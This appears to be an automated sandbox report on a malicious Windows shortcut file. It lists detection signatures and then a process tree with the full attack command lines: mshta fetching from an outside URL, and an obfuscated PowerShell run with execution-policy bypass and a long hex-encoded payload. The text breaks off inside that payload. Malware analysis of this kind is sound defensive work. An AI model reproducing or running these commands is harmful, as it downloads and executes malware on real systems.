Edit tour
Windows
Analysis Report
duyba.lnk.download.lnk
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 5524 cmdline:
"C:\Window s\System32 \forfiles. exe" /p C: \Windows\S ystem32 /m cmmon32.e xe /c "pow ershell . \*i*\*2\ms h*e https: //tiffany- careers.co m/ghep2 MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) - conhost.exe (PID: 5972 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 984 cmdline:
. \*i*\*2\ msh*e http s://tiffan y-careers. com/ghep2 MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 5060 cmdline:
"C:\Window s\System32 \mshta.exe " https:// tiffany-ca reers.com/ ghep2 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 4308 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction clea n ($RptYb) {return -s plit ($Rpt Yb -replac e '..', '0 x$& ')};$T mDJyn = cl ean('85EF5 1FEE837F81 2F61F1656D 38BD83A6C0 1DC072CBCF 246D841948 987B9BF3C9 407C4F8ABE 6B3AC5C50C 036D5BF68E 3CA56C456F B1B2404AC5 CC6C48224E 43EFF1648E 7AF29CE17B F2F62A8A7C 7F4DE07613 F737B271AA 100A67B779 C122AD966C 15CB3C8239 08B36BCCBE 9B592D0373 65125E5631 2B004E07F5 13AA459ACF 6BFEB51AC3 1152191AF9 4E56667A3D 2A99C72466 ED1996C430 D4FDBDAAC4 44A645133F FD6F506740 CE6AE51237 562A4307EA F56A5E569B 87DC171D55 0AD8A419C8 822B7E0E83 57121B4EE7 5DD16DB89B 145D82B1C9 09ABECFAF2 CA7275A13D 2BF9E37AD9 8257B106D8 8D6988DB29 0C39C801B5 ACD6E2249F 2E178FCF16 B59452E1DF 6068D3A315 95646428A9 80314EE839 88BEB6E930 DAD4F36408 61D45D0A05 4E18C6A6A1 DC88EC8B63 FC99EA26D5 53E7BB5359 CA978A904B 26D285DA2E 961D2C21E9 9F57B1C7F3 12913323B8 6FA89527AF 31A5917C2D A9F587D7AD 9CE91B6BF6 28678DF96F AE7AC81A58 B57440B8A9 E5A64E9BA9 6EB65240C9 8299F09149 5E74DF32B6 8B79275E29 37AB69BF3B D5F0EC1E9A 16BF58DA85 A870C38477 9CDAD74B0C CBA5DB9AC7 C88E57A05E 5FB4B20E10 C6C366F1EB 3C39148D6F D619830E13 2F469D25D5 55A553DD86 9B43849F23 E017958E14 F9380CFE36 FC613F285B 96CA940C56 2F0BBE8C24 1411E58D01 2E23CE1C60 0E9337A739 DB5AE1933D 65A4E4AF94 6B7B1F6CF2 68BD58702C 1B77726100 43D981C68C 31564F5D9B CBC8CD96EC CFFEEA53D3 65D01D36E4 B3484C9536 3DD6F39138 A67AA362CC 9C4190026A BF641C6DF0 E5D4A3DE01 E05606278D 5D2CD0D85D C89F086FAF B7491F9C40 F89ED33F7D 31C9484F5A 8801EF1BAB D7938BE509 E2133642C8 F35CA6BC2E 09BEBD5D6E 25F0DC3093 7B429ECB2F 268B5D4305 2547BFA5B9 ED413A38A2 0627D472EF B0F8E55085 05831BA893 4BFEEB8AE9 A4BF262824 5B5EC010BF 6D308960A1 5DD28CFFB2 D4FDABA50A DBE760CF86 DACFCC1CC1 0A16D02B0C 2946FCEDF7 4A822836F4 B0F4975FF4 6B0CBA3CB4 95C20FC2E2 D372C357A0 897500BE09 B0F824AA76 8EAFC28D39 243CF341DE 1E2A07E5CB D4B0252080 E82D760C61 806F6F7994 A7DE1DCAB9 D55F435A87 A935C06EC1 E878265F12 1BBA0C1C3B 138C1C358E 3620FE1A9D 778846E6E0 CC25C2E6EF 13359D6033 DE5B1EE137 90F98BE7CD 35C3B75489 7DB4583B2B 846BCD4E19 06C8F24163 36E8F269DA 57FC2A9824 FD6457D1FB C840D50A0E BE6EA5D36F CDCAEB2431 8E174CC5E3 3792642277 DCC1EBD38F 0C1E9233BA 2B6E85C963 CD7EA29A78 A0D2F2F3C1 C85EEA9CB6 46881CEB31 4F342ECD05 D23D5A7547 21D804D256 2F5FDA4713 31489B6143 1D4EB09A03 B9EF4D7FB5 B3E8091B05 427A6364A5 B6D0281A41 D08DF8F77C E3D19BBEDA 721A10EB06 19CC5BD0A3 56D2E124CD 2962CE26B9 E426500BC0 9F540E75EB D01524B243 9910F60003 64849B4B84 9A10268817 BBDBE676C5 F3DC1D39FA 1F1A09760E 6B0902B7C5 2C8F09DE7B F7015A0295 59284A5734 39130DC091 2C8C12F8AF D9D26F921A F247BD1AFF BD37E1985F 8D2709B4CE 2681126C3B E8125DB7B0 AB4C0CF456